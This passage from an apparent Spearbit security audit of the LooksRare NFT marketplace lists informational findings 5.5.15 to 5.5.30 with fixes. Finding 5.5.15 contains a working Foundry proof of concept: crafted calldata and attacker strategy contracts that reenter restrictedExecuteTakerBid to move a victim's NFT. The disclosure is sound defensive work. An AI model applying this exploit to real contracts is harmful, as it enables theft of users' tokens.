Note that in most cases (except StrategyItemIdsRange) one can enforce Ti = Ta = Mi = Ma and refactor this logic into a utility function. Recommendation: Document why the different length comparisons are not enforced or explicitly enforce the equalities. One possible reason that the equality checks have been skipped could be due to gas saving and leaving it up to the taker to provide the most compact calldata. LooksRare: TakerXxx struct have been merged into a single Taker struct that does not include itemIds or amounts. So this issue is not relavent anymore, see PR 383. Spearbit: Verified. +5.5.15 Requirements/checks for adding new transfer managers (or strategies) are really important to avoid self-reentrancy through restrictedExecuteTakerBid from unexpected call sites Severity: Informational Context: • TransferSelectorNFT.sol#L48 • LooksRareProtocol.sol#L243 • StrategyManager.sol#L71-L73 Description: When a new transfer manager gets added to the protocol, there is a check to make sure that this manager cannot be the protocol itself. This is really important as restrictedExecuteTakerBid allows the protocol itself to call this endpoint. If the check below was omitted: if ( transferManagerForAssetType == address(0) || // transferManagerForAssetType == address(this) || selectorForAssetType == bytes4(0) ) { } revert ManagerSelectorEmpty(); The owner can add the protocol itself as a transfer manager for a new asset type and pick the selector to be ILooksRareProtocol.restrictedExecuteTakerBid.selector. Then the owner along with a special address can collude and drain users' NFT tokens from an actual approved transfer manager for ERC721/ERC1155 assets. The special feature of restrictedExecuteTakerBid is that once it's called the provided parameters by the maker are not checked/verified against any signatures. The PoC below includes 2 different custom strategies for an easier setup but they are not necessary (one can use the default strategy). One creates the calldata payload and the other is called later on to select a desired NFT token id. 60 The calldata to restrictedExecuteTakerBid(...) is crafted so that the corresponding desired parameters for an actual transferManager.call can be set by itemIds; parameters offset ,! ------------------------------------------------------------------------------------------------------- c ,! 0x0000 interpreted parameters ---------- | original msg.sender, , can be changed by stuffing 0s 0000000000000000000000000000000000000000000000000000000000000080 0000000000000000000000000000000000000000000000000000000000000180 ,! 00000000000000000000000000000000000000000000000000000000000000X1 ; sender ,! 00000000000000000000000000000000000000000000000000000000000000a0 ,! msg.sender / signer ho, orderHash, 0xa0 | collection | signer / | Ta.r or | i[] ptr 0x0080 ,! 
to, can be changed by stuffing 0s 00000000000000000000000000000000000000000000000000000000000000X2 ; Tb.r | a[] ptr , 0x0180 00000000000000000000000000000000000000000000000000000000000000X3 ; Tb.p_max 00000000000000000000000000000000000000000000000000000000000000a0 00000000000000000000000000000000000000000000000000000000000000c0 00000000000000000000000000000000000000000000000000000000000000e0 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 from 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000X4 ; sid 00000000000000000000000000000000000000000000000000000000000000X5 ; t 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000X6 ; T 00000000000000000000000000000000000000000000000000000000000000X7 ; C 00000000000000000000000000000000000000000000000000000000000000X8 ; signer ,! 00000000000000000000000000000000000000000000000000000000000000X9 ; ts 00000000000000000000000000000000000000000000000000000000000000Xa ; te 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000001c0 00000000000000000000000000000000000000000000000000000000000001e0 0000000000000000000000000000000000000000000000000000000000000200 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 | i[].len | i[0] | i[1] | i[2] | i[3] | i[4] | i[5] | i[6] | i[7] | i[8] | i[9] | i[10] | i[11] | i[12] | i[13] , | i[14] | i[15] | i[16] | i[17] | i[18] | i[19] | i[20] | i[21] | i[22] ; T = real_collection ; C = currency ; t = assetType ; sid = strategyId ; ts = startTime ; te = endTime ; Ta = takerAsk ; Tb = takerBid // file: test/foundry/AssetAttack.t.sol pragma solidity 0.8.17; import {IStrategyManager} from "../../contracts/interfaces/IStrategyManager.sol"; import {IBaseStrategy} from "../../contracts/interfaces/IBaseStrategy.sol"; import {OrderStructs} from "../../contracts/libraries/OrderStructs.sol"; import {ProtocolBase} from "./ProtocolBase.t.sol"; import {MockERC20} from "../mock/MockERC20.sol"; 61 interface IERC1271 { function isValidSignature( bytes32 digest, bytes calldata signature ) external returns (bytes4 magicValue); } contract PayloadStrategy is IBaseStrategy { address private owner; address private collection; address private currency; uint256 private assetType; address private signer; uint256 private nextStartegyId; constructor() { owner = msg.sender; } function set( address _collection, address _currency, uint256 _assetType, address _signer, uint256 _nextStartegyId ) external { if(msg.sender != owner) revert(); collection = _collection; currency = _currency; assetType = _assetType; signer = _signer; nextStartegyId = _nextStartegyId; } function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function execute( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ ) external view returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) { itemIds = new uint256[](23); itemIds[0] = 0xa0; itemIds[1] = 0xc0; itemIds[2] = 0xe0; 62 itemIds[8] = 
nextStartegyId; itemIds[9] = assetType; itemIds[11] = uint256(uint160(collection)); itemIds[12] = uint256(uint160(currency)); itemIds[13] = uint256(uint160(signer)); itemIds[14] = 0; // startTime itemIds[15] = type(uint256).max; // endTime itemIds[17] = 0x01c0; itemIds[18] = 0x01e0; itemIds[19] = 0x0200; } } contract ItemSelectorStrategy is IBaseStrategy { address private owner; uint256 private itemId; uint256 private amount; constructor() { owner = msg.sender; } function set( uint256 _itemId, uint256 _amount ) external { if(msg.sender != owner) revert(); itemId = _itemId; amount = _amount; } function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function execute( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ external view returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) itemIds = new uint256[](1); itemIds[0] = itemId; amounts = new uint256[](1); amounts[0] = amount; ) { } } contract AttackTest is ProtocolBase { PayloadStrategy private payloadStrategy; 63 ItemSelectorStrategy private itemSelectorStrategy; MockERC20 private mockERC20; // // can be an arbitrary address uint256 private signingOwnerPK = 42; address private signingOwner = vm.addr(signingOwnerPK); // this address will define an offset in the calldata // and can be changed up to a certain upperbound by // stuffing calldata with 0s. address private specialUser1 = address(0x180); // NFT token recipient of the attack can also be changed // up to a certain upper bound by stuffing the calldata with 0s address private specialUser2 = address(0x3a0); // can be an arbitrary address address private victimUser = address(505); function setUp() public override { super.setUp(); vm.startPrank(_owner); { looksRareProtocol.initiateOwnershipTransfer(signingOwner); } vm.stopPrank(); vm.startPrank(signingOwner); { looksRareProtocol.confirmOwnershipTransfer(); mockERC20 = new MockERC20(); looksRareProtocol.updateCurrencyWhitelistStatus(address(mockERC20), true); looksRareProtocol.updateCreatorFeeManager(address(0)); mockERC20.mint(victimUser, 1000); mockERC721.mint(victimUser, 1); // This particular strategy is not a requirement of the exploit. 
// it just makes it easier payloadStrategy = new PayloadStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, PayloadStrategy.execute.selector, true, address(payloadStrategy) ); itemSelectorStrategy = new ItemSelectorStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, ItemSelectorStrategy.execute.selector, false, address(itemSelectorStrategy) ); } 64 vm.stopPrank(); _setUpUser(victimUser); } function testAttack() public { vm.startPrank(signingOwner); looksRareProtocol.addTransferManagerForAssetType( 2, address(looksRareProtocol), looksRareProtocol.restrictedExecuteTakerBid.selector ); payloadStrategy.set( address(mockERC721), address(mockERC20), 0, victimUser, 2 // itemSelectorStrategy ID ); itemSelectorStrategy.set(1, 1); OrderStructs.MakerBid memory makerBid = _createSingleItemMakerBidOrder({ // payloadStrategy bidNonce: 0, subsetNonce: 0, strategyId: 1, assetType: 2, // LooksRareProtocol itself orderNonce: 0, collection: address(0x80), // calldata offset currency: address(mockERC20), signer: signingOwner, maxPrice: 0, itemId: 1 }); bytes memory signature = _signMakerBid(makerBid, signingOwnerPK); OrderStructs.TakerAsk memory takerAsk; vm.stopPrank(); vm.prank(specialUser1); looksRareProtocol.executeTakerAsk( takerAsk, makerBid, signature, _EMPTY_MERKLE_TREE, _EMPTY_AFFILIATE ); assertEq(mockERC721.balanceOf(victimUser), 0); assertEq(mockERC721.ownerOf(1), specialUser2); } } Recommendation: It is important to pay extra attention when modifying the requirements for adding new transfer managers (or even strategies). If special care is not taken, a self-reentrancy for the protocol is possible that might affect the users' tokens on a trusted transfer manager (does not even need to be related to the new transfer manager or strategy added). 65 Also to avoid any future pitfall, it is recommended to not use the restrictedExecuteTakerBid and remove it from the codebase. restrictedExecuteTakerBid is only used when executing multiple taker bids for non-atomic transactions. One can instead add an extra boolean parameter to _executeTakerBid such that if true, _execute- TakerBid would revert on errors or if false it would turn into a no-op that would return a 0 amount. Or we can have two different implementations of _executeTakerBid with almost the same logic. This would avoid the external calls from the protocol to itself through restrictedExecuteTakerBid. LooksRare: Acknowledged. Spearbit: Acknowledged. +5.5.16 viewCreatorFeeInfo can be simplified Severity: Informational Context: • CreatorFeeManagerWithRebates.sol#L50-L69 • CreatorFeeManagerWithRoyalties.sol#L55-L76 Description: viewCreatorFeeInfo includes a low-level staticcall to collection's royaltyInfo endpoint and later its return status is compared and the return data is decoded. 
Recommendation: We can simplify viewCreatorFeeInfo and avoid the low-level call by using a try/catch block.

• CreatorFeeManagerWithRoyalties:

for (uint256 i; i < length; ) {
    try IERC2981(collection).royaltyInfo(itemIds[i], price) returns (
        address newCreator,
        uint256 newCreatorFee
    ) {
        if (i == 0) {
            creator = newCreator;
            creatorFee = newCreatorFee;
            unchecked { ++i; }
            continue;
        }
        if (newCreator != creator || newCreatorFee != creatorFee) {
            revert BundleEIP2981NotAllowed(collection);
        }
    } catch {}
    unchecked { ++i; }
}

• CreatorFeeManagerWithRebates:

for (uint256 i; i < length; ) {
    try IERC2981(collection).royaltyInfo(itemIds[i], price) returns (
        address newCreator,
        uint256 /* newCreatorFee */
    ) {
        if (i == 0) {
            if (newCreator == address(0)) break;
            creator = newCreator;
            unchecked { ++i; }
            continue;
        }
        if (newCreator != creator) {
            revert BundleEIP2981NotAllowed(collection);
        }
    } catch {}
    unchecked { ++i; }
}

As a bonus we get some gas optimizations:

testTakerBidERC721WithRoyaltiesFromRegistry(uint256) (gas: -40 (-0.006%))
testCreatorRebatesArePaidForERC2981() (gas: -1056 (-0.162%))
testCreatorRoyaltiesGetPaidForERC2981() (gas: -1076 (-0.164%))
testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -4188 (-0.424%))
testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -5118 (-0.474%))
testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -4621 (-0.500%))
testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -5202 (-0.520%))
Overall gas change: -21301 (-2.250%)

Note: For the above gas optimization, testDutchAuction is adjusted to:

- vm.assume(elapsedTime <= 3_600);
+ vm.assume(elapsedTime < 3_600);

since _checkValidityTimestamps returns the TOO_LATE_TO_EXECUTE_ORDER error code for the edge case of elapsedTime == 3600.
LooksRare: Fixed in PR 341.
Spearbit: Verified.

+5.5.17 _verifyMerkleProofOrOrderHash can be simplified
Severity: Informational
Context:
• LooksRareProtocol.sol#L567
Description: _verifyMerkleProofOrOrderHash includes an if/else block that calls into _computeDigestAndVerify with almost the same inputs (only the hash is different).
Recommendation: We can simplify _verifyMerkleProofOrOrderHash:

function _verifyMerkleProofOrOrderHash(
    OrderStructs.MerkleTree calldata merkleTree,
    bytes32 orderHash,
    bytes calldata signature,
    address signer
) private view {
    if (merkleTree.proof.length != 0) {
        if (!MerkleProofCalldata.verifyCalldata(merkleTree.proof, merkleTree.root, orderHash)) {
            revert WrongMerkleProof();
        }
        orderHash = merkleTree.hash();
    }
    _computeDigestAndVerify(orderHash, signature, signer);
}

testTakerBidMultipleOrdersSignedERC721() (gas: -3 (-0.000%))
testTakerAskMultipleOrdersSignedERC721() (gas: -3 (-0.000%))
testTakerAskERC721WithRoyaltiesFromRegistry(uint256) (gas: -40 (-0.006%))
Overall gas change: -46 (-0.006%)

LooksRare: Fixed in PR 317.
Spearbit: Verified.

+5.5.18 isOperatorValidForTransfer can be modified to refactor more of the logic
Severity: Informational
Context:
• TransferManager.sol#L59
• TransferManager.sol#L91
• TransferManager.sol#L133
• TransferManager.sol#L258
Description: isOperatorValidForTransfer is only used to revert if necessary. The logic around the revert decision is duplicated on all call sites.
Recommendation: It would be best to replace all the occurrences of the following:

if (!isOperatorValidForTransfer(from, msg.sender)) {
    revert TransferCallerInvalid();
}

with:

_validateCallerForTransfer(from);

where _validateCallerForTransfer is the renamed/modified isOperatorValidForTransfer:

function _validateCallerForTransfer(address user) internal view {
    if (
        isOperatorWhitelisted[msg.sender] &&
        hasUserApprovedOperator[user][msg.sender]
    ) {
        return;
    }
    revert TransferCallerInvalid();
}

LooksRare: Fixed in PR 316.
Spearbit: Verified.

+5.5.19 Keep maximum allowed number of characters per line to 120
Severity: Informational
Context:
• .solhint.json
Description: There are a few long lines in the code base.

contracts/executionStrategies/StrategyCollectionOffer.sol
  21:2    error    Line length must be no more than 120 but current length is 127    max-line-length
  27:2    error    Line length must be no more than 120 but current length is 163    max-line-length
  29:2    error    Line length must be no more than 120 but current length is 121    max-line-length
  30:2    error    Line length must be no more than 120 but current length is 121    max-line-length
  67:2    error    Line length must be no more than 120 but current length is 163    max-line-length
  69:2    error    Line length must be no more than 120 but current length is 121    max-line-length
  70:2    error    Line length must be no more than 120 but current length is 121    max-line-length
  118:2   error    Line length must be no more than 120 but current length is 123    max-line-length
  119:2   error    Line length must be no more than 120 but current length is 121    max-line-length

contracts/executionStrategies/StrategyDutchAuction.sol
  20:2    error    Line length must be no more than 120 but current length is 163    max-line-length
  22:2    error    Line length must be no more than 120 but current length is 121    max-line-length
  23:2    error    Line length must be no more than 120 but current length is 121    max-line-length
  26:5    warning  Function has cyclomatic complexity 9 but allowed no more than 7   code-complexity
  70:31   warning  Avoid to make time-based decisions in your business logic         not-rely-on-time
  85:2    error    Line length must be no more than 120 but current length is 123    max-line-length
  86:2    error    Line length must be no more than 120 but current length is 121    max-line-length
  92:5    warning  Function has cyclomatic complexity 8 but allowed no more than 7   code-complexity

contracts/executionStrategies/StrategyItemIdsRange.sol
  15:2    error    Line length must be no more than 120 but current length is 142    max-line-length
  20:2    error    Line length must be no more than 120 but current length is 163    max-line-length
  21:2    error    Line length must be no more than 120 but current length is 163    max-line-length
  22:2    error    Line length must be no more than 120 but current length is 121    max-line-length
  23:2    error    Line length must be no more than 120 but current length is 121    max-line-length
  25:5    warning  Function has cyclomatic complexity 12 but allowed no more than 7  code-complexity
  100:2   error    Line length must be no more than 120 but current length is 123    max-line-length
  101:2   error    Line length must be no more than 120 but current length is 121    max-line-length

contracts/helpers/OrderValidatorV2A.sol
  40:2    error    Line length must be no more than 120 but current length is 121    max-line-length
  53:2    error    Line length must be no more than 120 but current length is 121    max-line-length
  225:2   error    Line length must be no more than 120 but current length is 127    max-line-length
  279:2   error    Line length must be no more than 120 but current length is 127    max-line-length
  498:24  warning  Avoid to make time-based decisions in your business logic         not-rely-on-time
  501:26  warning  Avoid to make time-based decisions in your business logic         not-rely-on-time
  511:2   error    Line length must be no more than 120 but current length is 143    max-line-length
  593:5   warning  Function has cyclomatic complexity 9 but allowed no more than 7   code-complexity
  662:5   warning  Function has cyclomatic complexity 9 but allowed no more than 7   code-complexity
  758:5   warning  Function order is incorrect, internal view function can not go after internal pure function (line 727)  ordering
  830:5   warning  Function has cyclomatic complexity 10 but allowed no more than 7  code-complexity
  843:17  warning  Avoid to use inline assembly. It is acceptable only in rare cases  no-inline-assembly
  850:17  warning  Avoid to use inline assembly. It is acceptable only in rare cases  no-inline-assembly
  906:5   warning  Function has cyclomatic complexity 8 but allowed no more than 7   code-complexity
  963:5   warning  Function has cyclomatic complexity 8 but allowed no more than 7   code-complexity

contracts/helpers/ValidationCodeConstants.sol
  17:2    error    Line length must be no more than 120 but current length is 129    max-line-length
  18:2    error    Line length must be no more than 120 but current length is 121    max-line-length

contracts/interfaces/ILooksRareProtocol.sol
  160:2   error    Line length must be no more than 120 but current length is 122    max-line-length

contracts/libraries/OrderStructs.sol
  12:2    error    Line length must be no more than 120 but current length is 292    max-line-length
  18:2    error    Line length must be no more than 120 but current length is 292    max-line-length
  23:2    error    Line length must be no more than 120 but current length is 127    max-line-length
  49:5    warning  Function order is incorrect, struct definition can not go after state variable declaration (line 26)  ordering
  81:2    error    Line length must be no more than 120 but current length is 128    max-line-length
  144:2   error    Line length must be no more than 120 but current length is 131    max-line-length

49 problems (34 errors, 15 warnings)

Recommendation: For better readability, it would be best to keep the maximum line widths to 120. The .solhint.json file can be updated to:

@@ -1,9 +1,12 @@
 {
     "extends": "solhint:recommended",
     "rules": {
+        "code-complexity": ["warn", 7],
         "compiler-version": ["error", "^0.8.17"],
-        "func-visibility": [{ "ignoreConstructors": true }],
+        "func-visibility": ["warn", { "ignoreConstructors": true }],
         "func-name-mixedcase": "off",
+        "max-line-length": ["error", 120],
+        "ordering": "warn",
         "reason-string": "off",
         "var-name-mixedcase": "off"
     }

The above also includes adding the rules regarding code-complexity and ordering.
LooksRare: Fixed in PR 315 and PR 337.
Spearbit: Verified.

+5.5.20 avoid transferring in _transferFungibleTokens when sender and recipient are equal
Severity: Informational
Context:
• LooksRareProtocol.sol#L466
• LooksRareProtocol.sol#L445-L447
• LooksRareProtocol.sol#L452
• LooksRareProtocol.sol#L510
• LooksRareProtocol.sol#L518
Description: Currently, there is no check in _transferFungibleTokens to avoid transferring funds from sender to recipient when they are equal. There is only one such check outside of _transferFungibleTokens, when one wants to transfer to an affiliate. But if the bidUser is the creator, the ask recipient, or the protocolFeeRecipient, the check is missing.
Recommendation: It would be best to add a check in _transferFungibleTokens to avoid transferring funds when sender and recipient are equal:

function _transferFungibleTokens(
    address currency,
    address sender,
    address recipient,
    uint256 amount
) internal {
    if (sender == recipient) return;
    ...
}

and the check for the affiliate can be removed:

// If currency is ETH, funds are returned to sender at the end of the execution.
// If currency is ERC20, funds are not transferred from bidder to bidder (since it uses transferFrom).
_transferFungibleTokens(currency, bidUser, affiliate, totalAffiliateFeeAmount);

LooksRare: Although this is valid, these scenarios are not meant to happen, unlike the affiliate one, where it may come from future business requirements (e.g. for a market maker?).
Spearbit: Acknowledged. We would advise you to monitor calls where the bidUser is the creator, the ask recipient, or the protocolFeeRecipient.

+5.5.21 Keep the order of parameters consistent in updateStrategy
Severity: Informational
Context:
• StrategyManager.sol#L104-L123
Description: In updateStrategy, isActive is set first when updating storage, and it is the second parameter supplied to the StrategyUpdated event, but it is the last parameter supplied to updateStrategy.
Recommendation: For consistency, it would be best to make isActive the second parameter of updateStrategy.
LooksRare: Fixed in PR 313.
Spearbit: Verified.

+5.5.22 _transferFungibleTokens does not check whether the amount is 0
Severity: Informational
Context:
• LooksRareProtocol.sol#L466
• LooksRareProtocol.sol#L446
• LooksRareProtocol.sol#L452
• LooksRareProtocol.sol#L510
• LooksRareProtocol.sol#L518
Description: _transferFungibleTokens does not check whether amount is 0 to skip transferring to the recipient. For the ask recipient and creator amounts, the check is performed just before calling this function, but the check is missing for the affiliate and protocol fees.
Recommendation: It is recommended to include the check against 0 for the amount in _transferFungibleTokens; the checks for the ask recipient and creator amounts can then be removed, as they would be performed in the function itself:

function _transferFungibleTokens(
    address currency,
    address sender,
    address recipient,
    uint256 amount
) internal {
    if (amount == 0) return;
    ...
}

function _transferToAskRecipientAndCreatorIfAny(
    address[3] memory recipients,
    uint256[3] memory fees,
    address currency,
    address bidUser
) private {
    // @dev There is no check for address(0); if the creator recipient is address(0), the fee is set to 0.
    _transferFungibleTokens(currency, bidUser, recipients[1], fees[1]);

    // @dev There is no check for address(0) since the ask recipient can never be address(0).
    // If the ask recipient is the maker --> the signer cannot be the null address.
    // If the ask is the taker --> either it is the sender address or, if the recipient (in TakerAsk)
    // is set to address(0), it is adjusted to the original taker address.
    _transferFungibleTokens(currency, bidUser, recipients[2], fees[2]);
}

LooksRare: _payProtocolFeeAndAffiliateFee has been modified to only transfer funds to the affiliate and the protocol recipient when their corresponding amounts are non-zero in PR 334.
Spearbit: Verified.
+5.5.23 StrategyItemIdsRange.executeStrategyWithTakerAsk - Maker's bid amount might be entirely fulfilled by a single ERC1155 item
Severity: Informational
Context: StrategyItemIdsRange.sol#L75
Description: StrategyItemIdsRange allows a buyer to specify a range of potential item ids (both ERC721 and ERC1155) and a desired amount; a seller can then match the buyer's request by picking a subset of items from the provided range so that the desired amount of items is eventually fulfilled. However, a taker might pick a single ERC1155 item id from the range and fulfill the entire order with multiple instances of that same item.
Recommendation: After a short discussion with the client, we agreed that the described scenario is accepted as part of the normal behavior in the system. However, we strongly recommend informing the users about this potential edge case at the least.
LooksRare: Acknowledged.
Spearbit: Acknowledged.

+5.5.24 Define named constants
Severity: Informational
Context:
• ExecutionManager.sol#L289
• ExecutionManager.sol#L290
• OrderValidatorV2A.sol#L845
• OrderValidatorV2A.sol#L846
• OrderValidatorV2A.sol#L852
• OrderValidatorV2A.sol#L853
• OrderValidatorV2A.sol#L859
• InheritedStrategy.sol#L100
• InheritedStrategy.sol#L101
• MerkleProofCalldata.sol#L40
• MerkleProofCalldata.sol#L41
• MerkleProofCalldata.sol#L42
• MerkleProofMemory.sol#L40
• MerkleProofMemory.sol#L41
• MerkleProofMemory.sol#L42
• TransferSelectorNFT.sol#L30
• TransferSelectorNFT.sol#L31
• LooksRareProtocol.sol#L528-L530
• StrategyUSDDynamicAsk.sol#L107

assetType:
• TransferManager.sol#L145
• TransferManager.sol#L152
• TransferSelectorNFT.sol#L30
• TransferSelectorNFT.sol#L31

10_000:
• AffiliateManager.sol#L48
• CreatorFeeManagerWithRebates.sol#L75
• ExecutionManager.sol#L148
• ExecutionManager.sol#L155
• ExecutionManager.sol#L234
• ExecutionManager.sol#L241
• ExecutionManager.sol#L273
• StrategyFloorFromChainlink.sol#L134
• StrategyFloorFromChainlink.sol#L245
• StrategyFloorFromChainlink.sol#L249
• StrategyFloorFromChainlink.sol#L341
• OrderValidatorV2A.sol#L797
• LooksRareProtocol.sol#L439

Description:
• ExecutionManager.sol#L289 : 0x7476320f is cast sig "OutsideOfTimeRange()"
• TransferSelectorNFT.sol#L30 : 0xa7bc96d3 is cast sig "transferItemsERC721(address,address,address,uint256[],uint256[])" and can be replaced by TransferManager.transferItemsERC721.selector
• TransferSelectorNFT.sol#L31 : 0xa0a406c6 is cast sig "transferItemsERC1155(address,address,address,uint256[],uint256[])" and can be replaced by TransferManager.transferItemsERC1155.selector
Recommendation: Replace used literals with named constants.
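For instance (a sketch only; the constant names below are illustrative and not taken from the codebase), the literals called out above could be captured as named constants declared in the relevant contracts:

// Sketch: illustrative constant names, not the actual LooksRare code.
// cast sig "OutsideOfTimeRange()"
bytes4 private constant OUTSIDE_OF_TIME_RANGE_SELECTOR = 0x7476320f;

// Deriving the selectors from the contract avoids hardcoding them:
bytes4 private constant TRANSFER_ITEMS_ERC721_SELECTOR  = TransferManager.transferItemsERC721.selector;
bytes4 private constant TRANSFER_ITEMS_ERC1155_SELECTOR = TransferManager.transferItemsERC1155.selector;

// A shared basis-points denominator instead of the bare 10_000 literal:
uint256 private constant ONE_HUNDRED_PERCENT_IN_BP = 10_000;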
LooksRare: Fixed in PR 300 and PR 319.
Spearbit: Verified.

+5.5.25 price validation in executeStrategyWithTakerAsk, executeCollectionStrategyWithTakerAsk and executeCollectionStrategyWithTakerAskWithProof can be relaxed
Severity: Informational
Context:
• StrategyCollectionOffer.sol#L32
• StrategyCollectionOffer.sol#L73
• StrategyItemIdsRange.sol#L88-L90
Description: In the above context, a maker is bidding a maximum price pmax and a taker is asking a minimum price pmin; the strategy should calculate a price p in the range [pmin, pmax], and so we would need to have pmin ≤ pmax. The above strategies pick the execution price to be pmax (the maximum price bid by the maker), and since the taker is the caller to the protocol we would only need to require pmin ≤ pmax. But the current requirement is pmin = pmax:

if (
    ...
    || makerBid.maxPrice != takerAsk.minPrice
) {
    revert OrderInvalid();
}

Recommendation: Since the taker is the caller, we can relax the requirement for the minimum ask price to pmin ≤ pmax = p, which means the if statements can be modified to:

if (
    ...
    || makerBid.maxPrice < takerAsk.minPrice
) {
    revert OrderInvalid();
}

The relaxed validation does not affect the outcome: the taker would receive the maximum bid price regardless of what minimum ask price it provides (it just needs to not be higher).
LooksRare: Acknowledged. We think it is best to keep as it is. The minPrice/maxPrice should be used if the maker price fluctuates over time.
Spearbit: The recommendation does not ask for the removal of those parameters, but for modifying the if statement. Also, the price comparisons are removed completely from these strategies due to the change to the taker structs in PR 383.

+5.5.26 Change occurrences of whitelist to allowlist and blacklist to blocklist
Severity: Informational
Context:
• CurrencyManager.sol
• OrderValidatorV2A.sol
• ValidationCodeConstants.sol#L8
• ICurrencyManager.sol
• ITransferManager.sol
• LooksRareProtocol.sol
Description: In the codebase, whitelist (blacklist) is used to represent entities or objects that are allowed (denied) to be used or to perform certain tasks. This wording is not very accurate/suggestive and can also be offensive.
Recommendation: We can replace all occurrences of whitelist with allowlist (blacklist with blocklist), which conveys the function more clearly. Also, depending on the context, whitelisted can be replaced by either added or allowed. For ref: draft-knodel-terminology-02#section-2.2.
LooksRare: Fixed in PR 395.
Spearbit: Verified.

+5.5.27 Add more documentation on expected priceFeed decimals
Severity: Informational
Context: StrategyUSDDynamicAsk.sol#L107 and StrategyFloorFromChainlink.sol#L370
Description: The Chainlink strategies are making the following assumptions:
1. All priceFeeds in StrategyFloorFromChainlink have a decimals value of 18.
2. The priceFeed in StrategyUSDDynamicAsk has a decimals value of 8.
Any priceFeed that is added that does not match these assumptions would lead to incorrect calculations.
Recommendation: To make this more clear, and to make it less likely to make a mistake in the future, these assumptions should be documented somewhere in the code. To help further with code clarity, it is also recommended to move the hardcoded 1e8 value into its own constant variable, e.g.:

+ uint256 public constant ETHUSD_PRICEFEED_DECIMALS = 8;
...
- uint256 desiredSalePriceInETH = (desiredSalePriceInUSD * 1e8) / ethPriceInUSD;
+ uint256 desiredSalePriceInETH = (desiredSalePriceInUSD * 10 ** ETHUSD_PRICEFEED_DECIMALS) / ethPriceInUSD;
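A more defensive option (a sketch under assumptions: the feed exposes a Chainlink-style decimals() getter; contract and variable names are illustrative, not the actual strategy code) is to validate a feed's decimals at configuration time, so that a mismatching feed can never be wired up in the first place:

// Sketch only: illustrative names, assumes a Chainlink-style aggregator.
interface AggregatorV3InterfaceLike {
    function decimals() external view returns (uint8);
}

contract PriceFeedConfigSketch {
    uint8 public constant EXPECTED_PRICEFEED_DECIMALS = 18;

    address public priceFeed;

    function _setPriceFeed(address priceFeed_) internal {
        // Reject any feed whose decimals do not match the strategy's assumption.
        require(
            AggregatorV3InterfaceLike(priceFeed_).decimals() == EXPECTED_PRICEFEED_DECIMALS,
            "Unexpected price feed decimals"
        );
        priceFeed = priceFeed_;
    }
}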
LooksRare: Fixed in PR 307.
Spearbit: Verified.

+5.5.28 Code duplicates
Severity: Informational
Description:
• In some places, Chainlink staleness is checked using block.timestamp - updatedAt > maxLatency, and in other places it is checked using block.timestamp > maxLatency + updatedAt. Consider refactoring this code into a helper function (a sketch of such a helper follows after the recommendation below). Otherwise, it would be better to use only one version of the two code snippets across the protocol.
• The validation check to match assetType with the actual amount of items being transferred is duplicated among the different strategies instead of being implemented once at a higher level, such as in a common function or class that can be reused among the different strategies.
• _executeStrategyForTakerAsk and _executeStrategyForTakerBid almost share the same code.
• TakerBid and TakerAsk can be merged into a single struct.
• MakerBid and MakerAsk can be merged into a single struct.
Recommendation: It is advisable to avoid duplicating code by having a single, centralized version that can be easily maintained and updated. This also helps ensure consistency in validation and reduces the likelihood of bugs or errors.
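A minimal sketch of the staleness helper from the first point (the function and error names are illustrative; both existing snippets reduce to the same comparison):

// Sketch only: one canonical staleness check shared by all call sites.
abstract contract PriceFeedLatencySketch {
    error PriceNotRecentEnough(); // illustrative name

    function _validatePriceFeedLatency(uint256 updatedAt_, uint256 maxLatency_) internal view {
        // Equivalent to both `block.timestamp - updatedAt > maxLatency`
        // and `block.timestamp > maxLatency + updatedAt`.
        if (block.timestamp - updatedAt_ > maxLatency_) {
            revert PriceNotRecentEnough();
        }
    }
}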
LooksRare:
• Point 1 was fixed in PR 310.
• Points 2 and 5 were fixed in PR 305.
• Point 3 was fixed in PR 430.
• Point 4 was fixed in PR 383.
Spearbit: Verified.

+5.5.29 Low level calls are not recommended as they lack type safety and won't revert for calls to EOAs
Severity: Informational
Context: ExecutionManager.sol#L124 ExecutionManager.sol#L210 TransferSelectorNFT.sol#L89
Description: Low-level calls are not recommended for interaction between different smart contracts in modern versions of the compiler, mainly because they lack type safety and return data size checks, and won't revert for calls to Externally Owned Accounts.
Recommendation: Make sure to use interfaces to facilitate external calls when possible; otherwise, you should consider adding a check to validate that an address is not an EOA before calling it (the check implemented in StrategyManager.sol#L71-L73 is a good example of how to implement that).
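Such a check amounts to verifying that the target has deployed code, along these lines (a sketch; names are illustrative):

// Sketch only: reject targets with no runtime code before low-level calling them.
abstract contract ContractCheckSketch {
    error NotAContract(); // illustrative name

    function _validateIsContract(address target_) internal view {
        // An EOA (or a not-yet-deployed address) has no runtime code.
        if (target_.code.length == 0) {
            revert NotAContract();
        }
    }
}

Note that this still does not restore type safety or return-data-size checks, so interfaces remain the preferred option.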
LooksRare: Partially resolved in PR 308 by replacing the low-level call to transferManager with a high-level call.
Spearbit: Verified and acknowledged that it is partially resolved, as low-level calls are still in use for strategies.

+5.5.30 Insufficient input validation of orders (especially on the Taker's side)
Severity: Informational
Description: There is a lack of consistency in the validation of parameters, as some fields of the taker's order are checked against the maker's order while others are not. It is worth noting that we have not identified any significant impact caused by this issue.
• Missing validation of strategyId.
• Missing validation of collection.
